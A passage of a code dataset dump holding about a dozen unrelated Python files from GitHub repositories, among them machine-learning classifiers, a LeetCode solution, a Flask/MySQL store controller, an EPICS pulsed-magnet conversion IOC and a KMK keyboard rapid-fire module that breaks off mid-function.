is defined in the instrument.py file\n try:\n instrumentStatus.myDict['Instrument'] = instrumentStatus.instr\n response = instrumentStatus.types[instrumentStatus.statusType]()\n except Exception as e:\n log.error('error executing the status type: ' + str(e))\n response = {'APIStatus':'ERROR', 'Message':f\"error executing the status type '{statusType}'\"}\n else:\n print(response)\n return json.dumps(response)\n\n","repo_name":"KeckObservatoryArchive/ingestionAPI","sub_path":"tpx_status.py","file_name":"tpx_status.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20281299495","text":"from utils.ll import *\n\n\ndef removeNthFromEnd(head, n):\n dummy = ListNode(0, head)\n slow = dummy\n fast = head\n for _ in range(n):\n fast = fast.next\n while fast:\n slow = slow.next\n fast = fast.next\n slow.next = slow.next.next\n return dummy.next\n\n\nif __name__ == \"__main__\":\n head = InitLinkList([1, 2, 3, 4, 5, 6])\n res = removeNthFromEnd(head, 3)\n ForeachLinkList(res)\n","repo_name":"tantan1379/TRT_backup","sub_path":"Leetcode/19. Remove Nth Node From End of List.py","file_name":"19. Remove Nth Node From End of List.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16521793156","text":"## load adjmatrix\nimport scipy.io as sio\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras import layers\nimport matplotlib.pyplot as plt\nfrom keras.layers import Dropout\nfrom keras.layers import Dense, Activation, Dropout, LSTM,Bidirectional,GRU\nfrom keras.optimizers import Adam, SGD\nfrom keras.callbacks import EarlyStopping\nfrom keras.callbacks import ReduceLROnPlateau\nfrom keras import regularizers\nfrom sklearn.preprocessing import StandardScaler\nfrom keras.preprocessing.sequence import pad_sequences\n\n\nfrom keras.regularizers import l2#\n\nfold=10\ntunelength=30\nonetimelogacc=[]\nonetimesvmacc=[]\nonetimeDNNacc=[]\n\n\n\ncvtimes=1\ncvnum=1\n\n\nload_fn=str(\".\\\\NCI1\\\\NCI1cv{}traintimes{}.mat\".format(cvnum,cvtimes) )\n\ndata = sio.loadmat(load_fn)\nNCIlabelandsequence=data['trainlabelandsequence']\nNCItrainsequence=NCIlabelandsequence[:,1:112]\nNCItrainlabel=NCIlabelandsequence[:,0]\nNCItrainlabel=np.asarray(NCItrainlabel,'int64')\n#load test data\n\nload_fn2=str(\".\\\\NCI1\\\\NCI1cv{}testtimes{}.mat\".format(cvnum,cvtimes) )\ndata2 = sio.loadmat(load_fn2)\nNCIlabelandsequence2=data2['testlabelandsequence']\nNCItestsequence=NCIlabelandsequence2[:,1:112]\nNCItestlabel=NCIlabelandsequence2[:,0]\nNCItestlabel=np.asarray(NCItestlabel,'int64')\n\n\n\n# fix random seed for reproducibility\nseed = 7\nnp.random.seed(seed)\n\n# padding operation\nx_train=NCItrainsequence\nx_test=NCItestsequence\ny_train=NCItrainlabel\ny_test=NCItestlabel\n\nx_train=pad_sequences(x_train,truncating='post',maxlen=tunelength) \nx_test=pad_sequences(x_test,truncating='post',maxlen=tunelength)\n\n# Standardized operation\n\nsc = StandardScaler()\nsc.fit(x_train)\nx_train_std = sc.transform(x_train)\nx_test_std = sc.transform(x_test)\n\n\"\"\"\nmodel1:logisticRegression\n\"\"\"\nfrom sklearn.linear_model import LogisticRegression\nclassifier=LogisticRegression(solver='liblinear',multi_class='ovr',max_iter=1000,verbose=1, n_jobs=1)\nclassifier.fit(x_train_std,y_train)\ny_predict=classifier.predict(x_test_std)\nscore=classifier.score(x_test_std,y_test)\nprint(\"Accuracy\", score)\nonetimelogacc.append(score)\n\"\"\"\nmodel2:svm\n\"\"\"\n\nfrom sklearn import svm\nmodel=svm.SVC(kernel='rbf',max_iter=1000)\nmodel.fit(x_train_std,y_train)\nscore2=model.score(x_test_std,y_test)\nprint(\"Accuracy\", score2)\nonetimesvmacc.append(score2)\n\n##########################\n\n# Deep neural network on keras platform \n###########################\n\nmodel=Sequential()\nmodel.add(layers.Dense(64,input_dim=tunelength,activation='relu',kernel_regularizer=regularizers.l2(0.001)))\nmodel.add(layers.Dense(32,activation='relu',kernel_regularizer=regularizers.l2(0.001)))\nmodel.add(layers.Dense(16,activation='relu',kernel_regularizer=regularizers.l2(0.001)))\nmodel.add(layers.Dense(1,activation='sigmoid'))\n\nopt=Adam(lr=0.001)\nreduce_lr = ReduceLROnPlateau(monitor='val_loss', patience=10, verbose=1,factor=0.1, min_lr=0.000000001,mode='auto') #learning rate decrease\n\nmodel.compile(loss='binary_crossentropy',optimizer=opt,metrics=['accuracy'])\nmodel.summary()\nhistory=model.fit(x_train_std,y_train,\n\t\t\t\t epochs=300,\n\t\t\t\t verbose=True,\n# validation_split=0.1,\n\t\t\t\t callbacks=[reduce_lr],\n\t\t\t\t validation_data=(x_test,y_test),\n\t\t\t\t batch_size=50)\nloss,accuracy1=model.evaluate(x_train_std,y_train,verbose=0)\nprint(\"Training Accuracy: {:.4f}\".format(accuracy1))\nloss,accuracy2=model.evaluate(x_test_std,y_test,verbose=0)\nprint(\"Test Accuracy: {:.4f}\".format(accuracy2))\nonetimeDNNacc.append(accuracy2)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"lbtjackbluce/Biogc","sub_path":"Example1-coding-NCI1/ClassifierNCI1.py","file_name":"ClassifierNCI1.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30508811179","text":"import numpy as np \nimport pandas as pd\n\nS1 = np.array ([10000,3000,6000,np.nan,3000,1500,np.nan,9500,1580])\nS2 = np.array ([7,np.nan,5,8,12,np.nan,np.nan,2,3])\nS3 = np.array ([np.nan,12,5,6,14,7,np.nan,2,31])\nS4 = np.array ([\"BT\",\"BT\",\"IK\",\"IK\",\"IK\",\"IK\",\"BT\",\"BT\",\"BT\"])\ndf = pd.DataFrame(\n {\n \"Maas\" : S1, \n \"S2\" : S2,\n \"S3\" : S3,\n \"Dep\" : S4\n }\n)\nprint(df )\nprint(df.groupby(\"Dep\")[\"Maas\"].mean())\n \ndf = (df[\"Maas\"].fillna(df.groupby(\"Dep\")[\"Maas\"].transform(\"mean\"))) \nprint(df)\n ","repo_name":"samilyilmaz26/pythonDersleri","sub_path":"12-VeriAnaliz/4-VeriIsleme/4_CatKirilimAtama/proje.py","file_name":"proje.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6561088868","text":"from statiskit import linalg, core\n\nimport unittest\nfrom nose.plugins.attrib import attr\n\n@attr(linux=True,\n osx=True,\n win=True,\n level=1)\nclass TestMultinormal(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Test multinormal distribution construction\"\"\"\n cls._dist = core.MultinormalDistribution(linalg.Vector([0., 0., 0.]), linalg.Matrix([[1.0, 0.0, 0.0],\n [0.0, 1.0, 0.0],\n [0.0, 0.0, 1.0]]))\n\n def test_simulation(self):\n \"\"\"Test multinormal distribution simulation\"\"\"\n data = self._dist.simulation(20)\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"Test distribution deletion\"\"\"\n del cls._dist","repo_name":"Global-localhost/Core-2","sub_path":"test/test_multinormal.py","file_name":"test_multinormal.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"33191669359","text":"import numpy as np\nfrom insects import *\nfrom image_treatment import *\n\n\n# 获取一个批次内样本随机缩放的尺寸\ndef get_img_size(mode): # 此函数的作用是将训练集或验证集中的图片尺寸随机缩放\n if (mode == 'train') or (mode == 'valid'):\n inds = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\n ii = np.random.choice(inds)\n img_size = 320 + ii * 32\n else:\n img_size = 608\n return img_size\n\n\n# a=get_img_size('train')\n# print(a)\n\n\n# 将 list形式的batch数据 转化成多个array构成的tuple\ndef make_array(batch_data): # 将batch_data中的数据分别取出\n img_array = np.array([item[0] for item in batch_data], dtype='float32')\n gt_box_array = np.array([item[1] for item in batch_data], dtype='float32')\n gt_labels_array = np.array([item[2] for item in batch_data], dtype='int32')\n img_scale = np.array([item[3] for item in batch_data], dtype='int32')\n return img_array, gt_box_array, gt_labels_array, img_scale\n\n\n# 批量读取数据,同一批次内图像的尺寸大小必须是一样的,\n# 不同批次之间的大小是随机的,\n# 由上面定义的get_img_size函数产生\ndef data_loader(datadir, batch_size=10, mode='train'):\n cname2cid = get_insect_names()\n records = get_annotations(cname2cid, datadir)\n\n def reader():\n if mode == 'train':\n np.random.shuffle(records) # 将records中的record��序打乱\n batch_data = []\n img_size = get_img_size(mode) # 获取一个批次内样本随机缩放的尺寸\n for record in records:\n # print(record)\n img, gt_bbox, gt_labels, im_shape = get_img_data(record,\n size=img_size)\n batch_data.append((img, gt_bbox, gt_labels, im_shape))\n if len(batch_data) == batch_size:\n yield make_array(batch_data)\n batch_data = []\n img_size = get_img_size(mode)\n if len(batch_data) > 0:\n yield make_array(batch_data)\n\n return reader\n\n\n# d = data_loader('./insects/train', batch_size=2, mode='train')\n# img, gt_boxes, gt_labels, im_shape = next(d())\n# print(img.shape, gt_boxes.shape, gt_labels.shape, im_shape)\n# 测试数据读取\n\n# 将 list形式的batch数据 转化成多个array构成的tuple\ndef make_test_array(batch_data):\n img_name_array = np.array([item[0] for item in batch_data])\n img_data_array = np.array([item[1] for item in batch_data], dtype = 'float32')\n img_scale_array = np.array([item[2] for item in batch_data], dtype='int32')\n return img_name_array, img_data_array, img_scale_array\n\n# 测试数据读取\ndef test_data_loader(datadir, batch_size= 10, test_image_size=608, mode='test'):\n \"\"\"\n 加载测试用的图片,测试数据没有groundtruth标签\n \"\"\"\n image_names = os.listdir(datadir)\n def reader():\n batch_data = []\n img_size = test_image_size\n for image_name in image_names:\n file_path = os.path.join(datadir, image_name)\n img = cv2.imread(file_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n H = img.shape[0]\n W = img.shape[1]\n img = cv2.resize(img, (img_size, img_size))\n\n mean = [0.485, 0.456, 0.406]\n std = [0.229, 0.224, 0.225]\n mean = np.array(mean).reshape((1, 1, -1))\n std = np.array(std).reshape((1, 1, -1))\n out_img = (img / 255.0 - mean) / std\n out_img = out_img.astype('float32').transpose((2, 0, 1))\n img = out_img #np.transpose(out_img, (2,0,1))\n im_shape = [H, W]\n\n batch_data.append((image_name.split('.')[0], img, im_shape))\n if len(batch_data) == batch_size:\n yield make_test_array(batch_data)\n batch_data = []\n if len(batch_data) > 0:\n yield make_test_array(batch_data)\n\n return reader\n# d = test_data_loader('./insects/test/images',mode='test')\n# img, gt_boxes, gt_labels = next(d())\n# print(img.shape, gt_boxes.shape, gt_labels.shape)","repo_name":"SCUTyusong/yolov3-pytorch","sub_path":"data_read.py","file_name":"data_read.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73163170400","text":"from outputformat.title import boxtitle\nfrom outputformat.title import linetitle\nfrom outputformat import tools\n\n\ndef showlist(data, style=\"bullet\", title=False, return_str=False, precision=4):\n \"\"\"Show each item of a given list.\n\n Parameters\n ----------\n data : list\n List of items to display. Anything passed here will be converted to list\n\n style : string, default: 'bullet'\n How items are displayed. Options are: 'bullet', 'line', 'box', 'ordinal'\n 'bullet' or '*': Simple bullet points\n 'line' or '-': Line under the title, connected to the items\n 'box': Title with a box decoration\n 'ordinal' or '#': Shows a numbered list in ascending order\n\n In case any other string is passed, it will be used as marker\n For example:\n >>> showlist([\"Item A\", \"Item B\", \"Item C\"], style=\"~>\")\n ~> Item A\n ~> Item B\n ~> Item C\n\n title : string, optional\n Title to be displayed before the list.\n In case 'title = False', the 'line' and 'box' styles give the same result\n\n return_str : Bool, default: False\n If True, returns a string instead of printing.\n\n Returns\n -------\n string\n Only returns in case 'return_str = True', otherwise None\n\n \"\"\"\n\n # Start outputstring\n outputstring = \"\"\n\n # Prepare and clean data\n data = tools.prepare_data(data, precision=precision)\n\n # Get markers and title\n markers = tools.get_markers_and_title(style, title)\n marker_first, marker_middle, marker_last, title = markers\n\n # Add title, if we have one\n if title:\n outputstring += f\"{title}\\n\"\n\n # Add list items\n for idx in range(len(data)):\n\n marker = tools.decide_marker(\n idx, marker_first, marker_middle, marker_last, style, data\n )\n\n # Generate string for this item\n outputstring += f\"{marker} {data[idx]}\\n\"\n\n if return_str:\n return outputstring\n else:\n print(outputstring)\n","repo_name":"delestro/outputformat","sub_path":"outputformat/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"54"} +{"seq_id":"8222443633","text":"from bd import obtener_conexion\n\n\ndef listaUsuario():\n conecxion = obtener_conexion()\n usuarios = []\n with conecxion.cursor() as cursor:\n cursor.execute(\n 'SELECT usuarios.Codigo ,usuarios.nombresCompletos,usuarios.numeroCelular,usuarios.cuenta FROM tienda.usuarios')\n usuarios = cursor.fetchall()\n conecxion.close()\n return usuarios\n\n\ndef Agregar_usario(nombresCompletos, numeroCelular, cuenta):\n conecxion = obtener_conexion()\n with conecxion.cursor() as cursor:\n cursor.execute(\"INSERT INTO usuarios(nombresCompletos,numeroCelular,cuenta)VALUES(%s,%s,%s)\",\n (nombresCompletos, numeroCelular, cuenta))\n conecxion.commit()\n conecxion.close()\n\n\ndef buscar(numeroCelular):\n conecxion = obtener_conexion()\n usuarios = []\n with conecxion.cursor() as cursor:\n cursor.execute(\n 'SELECT u.Codigo,u.nombresCompletos,u.numeroCelular,u.cuenta FROM tienda.usuarios as u WHERE u.numeroCelular=%s', (numeroCelular,))\n usuarios = cursor.fetchall()\n conecxion.commit()\n conecxion.close()\n return usuarios\n\n\ndef edit(numeroCelular):\n conecxion = obtener_conexion()\n usuario = None\n with conecxion.cursor() as cursor:\n cursor.execute(\n 'SELECT usuarios.Codigo as Codigo, usuarios.nombresCompletos as nombresClompletos,usuarios.numeroCelular as numeroCelular,usuarios.cuenta as cuenta FROM tienda.usuarios WHERE numeroCelular=%s', (numeroCelular))\n usuario = cursor.fetchone()\n conecxion.close()\n return usuario\n\n\ndef actualizar(nombresCompletos, numeroCelular, cuenta, Codigo):\n conexion = obtener_conexion()\n with conexion.cursor() as cursor:\n cursor.execute(\"UPDATE tienda.usuarios SET nombresCompletos=%s, numeroCelular=%s , cuenta=%s WHERE Codigo=%s\",\n (nombresCompletos, numeroCelular, cuenta, Codigo))\n conexion.commit()\n conexion.close()\n\n\ndef edit_suma(numeroCelular):\n conecxion = obtener_conexion()\n usuarios = []\n with conecxion.cursor() as cursor:\n cursor.execute(\n 'SELECT u.Codigo,u.nombresCompletos,u.numeroCelular,u.cuenta FROM tienda.usuarios as u WHERE u.numeroCelular=%s', (numeroCelular,))\n usuarios = cursor.fetchone()\n conecxion.commit()\n conecxion.close()\n return usuarios\n\n\ndef guardarSuma(cuenta, numeroCelular):\n conexion = obtener_conexion()\n with conexion.cursor() as cursor:\n cursor.execute(\n 'UPDATE tienda.usuarios SET cuenta=%s WHERE numeroCelular=%s', (cuenta, numeroCelular))\n conexion.commit()\n conexion.close()\n\n\ndef eliminar(numeroCelular):\n conexion = obtener_conexion()\n with conexion.cursor() as cursor:\n cursor.execute(\n 'DELETE from usuarios Where numeroCelular=%s', (numeroCelular))\n conexion.commit()\n conexion.close()\n","repo_name":"stivencv7/Tienda","sub_path":"controladores/controlador_tienda.py","file_name":"controlador_tienda.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18183769242","text":"dict={\r\n \"name\":\"sagar\",\r\n \"class\":\"10th\",\r\n \"marks\":[20,20,50],\r\n \"avg\":30,\r\n \"another_dict\":{'name':'rahul','class':'11th'}, # another dict in the main dict\r\n 1: 2 # it is also a key:value pair\r\n}\r\nprint(dict.keys()) # it print keys of a dictionary\r\nprint(type(dict.keys())) # it print type which is a dictionary type\r\nprint(list(dict.keys())) # it print keys value as alist ,it is also called type_conversion\r\nprint(dict.values()) # it print value of a dictionary\r\nprint(dict.items()) # it print the dictionary in form tupples\r\nupdate_dict={\"score\":\"100\",\"century\":\"02\"\r\n}\r\ndict.update(update_dict)# here we first create a dict and then,we update it\r\nprint(dict)\r\nprint(dict.get(\"avg\")) # it also gives value but if that key is not present,it retrn none\r\n# whereas print(dict[\"avg\"]) throws an error if key not present","repo_name":"sagarglbitm/python-3.9","sub_path":"chapter_5/02_dict_methods.py","file_name":"02_dict_methods.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3329411700","text":"\"\"\"Main application.\"\"\"\n\nimport time as _time\nimport logging as _log\n\nfrom pcaspy import Alarm as _Alarm\nfrom pcaspy import Severity as _Severity\n\nimport siriuspy as _siriuspy\nimport siriuspy.util as _util\n\nfrom siriuspy.thread import LoopQueueThread as _LoopQueueThread, \\\n RepeaterThread as _RepeaterThread\nfrom siriuspy.namesys import SiriusPVName as _SiriusPVName\n\nfrom siriuspy.devices import PSProperty as _PSProperty\nfrom siriuspy.devices import StrengthConv as _StrengthConv\n\n\n__version__ = _util.get_last_commit_hash()\n\n\n# update frequency of strength PVs\nUPDATE_FREQ = 10.0 # [Hz]\n\n\nclass App:\n \"\"\"Responsible for updating the IOC database.\n\n Update values and parameters such as alarms.\n \"\"\"\n\n def __init__(self, driver, psnames, dbset, prefix):\n \"\"\"Create Power Supply controllers.\"\"\"\n self._driver = driver\n\n # write operation queue\n self._queue_write = _LoopQueueThread(is_cathread=True)\n self._queue_write.start()\n\n # mapping device to bbb\n self._psnames = [_SiriusPVName(psn) for psn in psnames]\n\n # print info about the IOC\n _siriuspy.util.print_ioc_banner(\n ioc_name='AS_PU_Conv',\n db=dbset,\n description='AS PU Conversion IOC',\n version=__version__,\n prefix=prefix)\n\n # build connectors and streconv dicts\n self._connectors, self._streconvs = \\\n self._create_connectors_and_streconv()\n\n # scan thread\n self._interval = 1 / UPDATE_FREQ\n self._thread_scan = _RepeaterThread(\n self._interval, self.scan, niter=0, is_cathread=True)\n self._thread_scan.start()\n\n # --- public interface ---\n\n @property\n def driver(self):\n \"\"\"Pcaspy driver.\"\"\"\n return self._driver\n\n @property\n def psnames(self):\n \"\"\"Return list of psnames.\"\"\"\n return self._psnames\n\n def check_connected(self, psname):\n \"\"\"Return connection status.\"\"\"\n streconv = self._streconvs[psname]\n conns = self._connectors[psname]\n if not streconv.connected:\n return False\n for conn in conns.values():\n if not conn.connected:\n return False\n return True\n\n def process(self):\n \"\"\"Process all write requests in queue and does a BBB scan.\"\"\"\n t0_ = _time.time()\n\n qsize = self._queue_write.qsize()\n if qsize > 2:\n logmsg = f'[Q] - write queue size is large: {qsize}'\n _log.warning(logmsg)\n\n dt_ = self._interval - (_time.time() - t0_)\n _time.sleep(max(dt_, 0))\n\n def read(self, reason):\n \"\"\"Read from database.\"\"\"\n _ = reason\n return None\n\n def write(self, reason, value):\n \"\"\"Enqueue write request.\"\"\"\n _log.info(\"[{:.2s}] - {:.36s} = {:.50s}\".format(\n 'W ', reason, str(value)))\n pvname = _SiriusPVName(reason)\n self.driver.setParam(reason, value)\n self.driver.updatePV(reason)\n self._queue_write.put(\n (self._write_operation, (pvname, value)), block=False)\n\n def scan(self):\n \"\"\"Scan all devices\"\"\"\n for psname in self.psnames:\n self.scan_device(psname)\n\n def scan_device(self, psname):\n \"\"\"Scan device and update ioc epics DB.\"\"\"\n # not connected\n if not self.check_connected(psname):\n conns = self._connectors[psname]\n for proptype in conns.keys():\n reason = psname.substitute(\n propty_name=psname.propty_name+'Kick',\n propty_suffix=proptype)\n self.driver.setParamStatus(\n reason, _Alarm.NO_ALARM, _Severity.NO_ALARM)\n return\n\n # all connected, calculate strengths\n streconv = self._streconvs[psname]\n conn = self._connectors[psname]\n limits = conn['SP'].limits\n curr0 = conn['SP'].value\n curr1 = conn['RB'].value\n curr2 = conn['Mon'].value\n curr3 = limits[0]\n curr4 = limits[-1]\n\n # NOTE: temporary fix\n if curr3 != curr3:\n curr3 = 0\n if curr4 != curr4:\n curr4 = 10000\n\n values = (curr0, curr1, curr2, curr3, curr4)\n # NOTE: investigate!\n #\n # usr/local/lib/python3.6/site-packages/epics/ca.py:1507:\n # UserWarning: ca.get('SI-01SA:PU-InjNLKckr:Voltage-Mon') timed out\n # after 1.00 seconds.\n # sirius-ioc-as-pu-conv.py[11332]: warnings.warn(msg %\n # (name(chid), timeout))\n # File \"/usr/local/lib/python3.6/site-packages/siriuspy/magnet/excdata.py\",\n # line 173, in _calc_interp\n # xvals, xtab, ytab, left=float('nan'), right=float('inf'))\n # File \"<__array_function__ internals>\", line 6, in interp\n # File \"/usr/local/lib/python3.6/site-packages/numpy/lib/function_base.py\",\n # line 1403, in interp\n # sirius-ioc-as-pu-conv.py[11332]: return interp_func(x, xp, fp, left, right)\n # TypeError: Cannot cast array data from dtype('O') to dtype('float64')\n # according to the rule 'safe'\n try:\n strengths = streconv.conv_current_2_strength(values)\n except TypeError:\n _log.error('Could not convert voltage to strength!')\n strengths = None\n\n if strengths is None or None in strengths:\n slims = None\n else:\n slims = strengths[-2:]\n if slims[0] > slims[1]:\n slims = slims[1], slims[0]\n\n # update SP, RB and Mon epics database\n for i, proptype in enumerate(conn.keys()):\n reason = psname.substitute(\n propty_name=psname.propty_name+'Kick',\n propty_suffix=proptype)\n if slims is None:\n self.driver.setParamStatus(\n reason, _Alarm.TIMEOUT_ALARM, _Severity.INVALID_ALARM)\n else:\n # update value\n self.driver.setParam(reason, strengths[i])\n # update limits\n kwargs = self.driver.getParamInfo(reason)\n kwargs.update({\n 'lolim': slims[0], 'low': slims[0], 'lolo': slims[0],\n 'hihi': slims[1], 'high': slims[1], 'hilim': slims[1]})\n self.driver.setParamInfo(reason, kwargs)\n # update alarm\n self.driver.setParamStatus(\n reason, _Alarm.NO_ALARM, _Severity.NO_ALARM)\n # update PV info\n self.driver.updatePV(reason)\n\n # --- private methods ---\n\n def _create_connectors_and_streconv(self):\n connectors = dict()\n streconv = dict()\n for psname in self.psnames:\n connectors[psname] = dict()\n conn = connectors[psname]\n conn['SP'] = _PSProperty(psname, propty='Voltage-SP')\n conn['RB'] = _PSProperty(psname, propty='Voltage-RB')\n conn['Mon'] = _PSProperty(psname, propty='Voltage-Mon')\n streconv[psname] = _StrengthConv(psname, proptype='Ref-Mon')\n return connectors, streconv\n\n def _write_operation(self, pvname, value):\n t0_ = _time.time()\n psname = pvname.device_name\n if 'CCoil' in pvname:\n psname += ':' + pvname.propty_name.split('Kick')[0]\n streconv = self._streconvs[psname]\n voltage = streconv.conv_strength_2_current(value)\n conn = self._connectors[psname]['SP']\n if conn.connected:\n self._connectors[psname]['SP'].value = voltage\n t1_ = _time.time()\n _log.info(\"[{:.2s}] - {:.36s} : {:.50s}\".format(\n 'T ', pvname,\n 'write operation took {:.3f} ms'.format((t1_-t0_)*1000)))\n","repo_name":"lnls-sirius/machine-applications","sub_path":"as-pu-conv/as_pu_conv/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7746,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"38995131719","text":"def solution(routes):\n answer = 1\n routes.sort(key = lambda x : (x[1], x[0]))\n base = routes[0][1]\n for route in routes:\n start, end = route\n if start <= base <= end:\n continue\n base = end\n answer += 1\n \n return answer","repo_name":"soominnn/Algorithms","sub_path":"Programmers/단속카메라.py","file_name":"단속카메라.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22307732864","text":"import os\nimport pickle\n\nimport util\n\n\nclass ScoreManager:\n best_scores = {}\n run_scores = {}\n\n filename = 'scores.dat'\n\n def save(self):\n for level_name, score in self.run_scores.iteritems():\n if level_name not in self.best_scores or score < self.best_scores[level_name]:\n self.best_scores[level_name] = score\n with open(self.filename, 'wb') as f:\n pickle.dump(self.best_scores, f)\n\n def load(self):\n self.run_scores.clear()\n if os.path.exists(self.filename):\n with open(self.filename, 'rb') as f:\n self.best_scores = pickle.load(f)\n\n def log_score(self, level_name, score):\n if level_name in self.run_scores:\n self.run_scores[level_name] += score\n else:\n self.run_scores[level_name] = score\n\n def get_record(self, mode, level_name):\n return self.best_scores.get(util.get_filename(mode, level_name), -1)\n","repo_name":"TheCornerPiece/JulyGame","sub_path":"scripts/score_manager.py","file_name":"score_manager.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"11872259840","text":"#/usr/bin/python\n\n####################\n# Name: Jason Holman\n# A#: A01895834\n####################\n\n# deleted row 662 from AIPiCar/PI_CAR_DATA3/PI_Car_Runs.csv\n# maximum value in inputs is 340\n\nfrom network import *\nimport csv\nimport numpy as np\nimport os\nimport pickle as cPickle\n\ndef process_csv(directory):\n input = []\n output = []\n for dirname, dirnames, filenames in os.walk(directory):\n for f in filenames:\n if f.endswith('.csv'):\n path = os.path.join(dirname, f)\n with open(path) as f:\n csv_reader = csv.reader(f, delimiter=',')\n line_count = 0\n for line in csv_reader:\n if line_count == 0:\n line_count += 1\n else:\n input.append(create_input(eval(line[2]), eval(line[3]), eval(line[4]), eval(line[5])))\n output.append(create_output(line[1]))\n return zip(input, output)\n\n\ndef create_output(output):\n commands = []\n for x in output.split(','):\n if x == 'up pressed':\n commands.append(1)\n elif x == 'right pressed':\n commands.append(2)\n elif x == 'left pressed':\n commands.append(3)\n elif x == 'down pressed':\n commands.append(4)\n if len(commands) == 0:\n commands.append(1)\n if commands[0] == 1:\n e = np.zeros((4, 1))\n e[0] = 1\n return e\n elif commands[0] == 2:\n e = np.zeros((4, 1))\n e[1] = 1\n return e\n elif commands[0] == 3:\n e = np.zeros((4, 1))\n e[2] = 1\n return e\n elif commands[0] == 4:\n e = np.zeros((4, 1))\n e[3] = 1\n return e\n\n\ndef create_input(x_left, x_right, slope_left, slope_right):\n inputs = np.array([x_left, x_right, slope_left, slope_right])\n inputs = inputs / 340.0\n inputs = np.reshape(inputs, (4, 1))\n return inputs\n\n\ndef train_ann(net, eta, mini_batch, num_epochs, lmbda, train_d, test_d, path):\n net.SGD(train_d, num_epochs, mini_batch, eta, lmbda, test_d,\n monitor_evaluation_cost=False,\n monitor_evaluation_accuracy=True,\n monitor_training_cost=False,\n monitor_training_accuracy=True)\n save(net, path)\n\n\ndef save(net, file_name):\n with open(file_name, 'wb') as fp:\n cPickle.dump(net, fp)\n\n\ndef load(file_name):\n with open(file_name, 'rb') as fp:\n nn = cPickle.load(fp)\n return nn\n\n\ndef main():\n data = process_csv('AIPiCar')\n image_ann = Network([4, 95, 45, 4], CrossEntropyCost)\n random.shuffle(data)\n train_data = data[int(len(data)*.1):]\n test_data = data[:int(len(data)*.1)]\n print('Data prepared starting training process')\n train_ann(image_ann, .25, 10, 10, 2.0, train_data, test_data, 'pck_nets/lines_ann.pck')\n train_ann(image_ann, .1, 10, 10, 2.0, train_data, test_data, 'pck_nets/lines_ann.pck')\n train_ann(image_ann, .01, 10, 10, 2.0, train_data, test_data, 'pck_nets/lines_ann.pck')\n\n net = load('pck_nets/lines_ann.pck')\n print(test_data[0][1])\n print(np.argmax(net.feedforward(test_data[0][0])))\n print(net.feedforward(test_data[0][0]))\n\n\nmain()\n","repo_name":"holmanjr/Project02","sub_path":"lines_ann.py","file_name":"lines_ann.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9775639002","text":"from random import randint\n\nfrom kmk.keys import make_argumented_key\nfrom kmk.modules import Module\n\n\nclass RapidFireMeta:\n def __init__(\n self,\n kc,\n interval=100,\n timeout=200,\n enable_interval_randomization=False,\n randomization_magnitude=15,\n toggle=False,\n ):\n self.kc = kc\n self.interval = interval\n self.timeout = timeout\n self.enable_interval_randomization = enable_interval_randomization\n self.randomization_magnitude = randomization_magnitude\n self.toggle = toggle\n\n\nclass RapidFire(Module):\n _active_keys = {}\n _toggled_keys = []\n _waiting_keys = []\n\n def __init__(self):\n make_argumented_key(\n validator=RapidFireMeta,\n names=('RF',),\n on_press=self._rf_pressed,\n on_release=self._rf_released,\n )\n\n def _get_repeat(self, key):\n if key.meta.enable_interval_randomization:\n return key.meta.interval + randint(\n -key.meta.randomization_magnitude, key.meta.randomization_magnitude\n )\n return key.meta.interval\n\n def _on_timer_timeout(self, key, keyboard):\n keyboard.tap_key(key.meta.kc)\n if key in self._waiting_keys:\n self._waiting_keys.remove(key)\n if key.meta.toggle and key not in self._toggled_keys:\n self._toggled_keys.append(key)\n self._active_keys[key] = keyboard.set_timeout(\n self._get_repeat(key), lambda: self._on_timer_timeout(key, keyboard)\n )\n\n def _rf_pressed(self, key, keyboard, *args, **kwargs):\n if key in self._toggled_keys:\n self._toggled_keys.remove(key)\n self._deactivate_key(key, keyboard)\n return\n if key.meta.timeout > 0:\n keyboard.tap_key(key.meta.kc)\n self._waiting_keys.append(key)\n self._active_keys[key] = keyboard.set_timeout(\n key.meta.timeout, lambda: self._on_timer_timeout(key, keyboard)\n )\n else:\n self._on_timer_timeout(key, keyboard)\n\n def _rf_released(self, key, keyboard, *args, **kwargs):\n if key not in self._active_keys:\n return\n if key in self._toggled_keys:\n if key not in self._waiting_keys:\n return\n self._toggled_keys.remove(key)\n if key in self._waiting_keys:\n self._waiting_keys.remove(key)\n 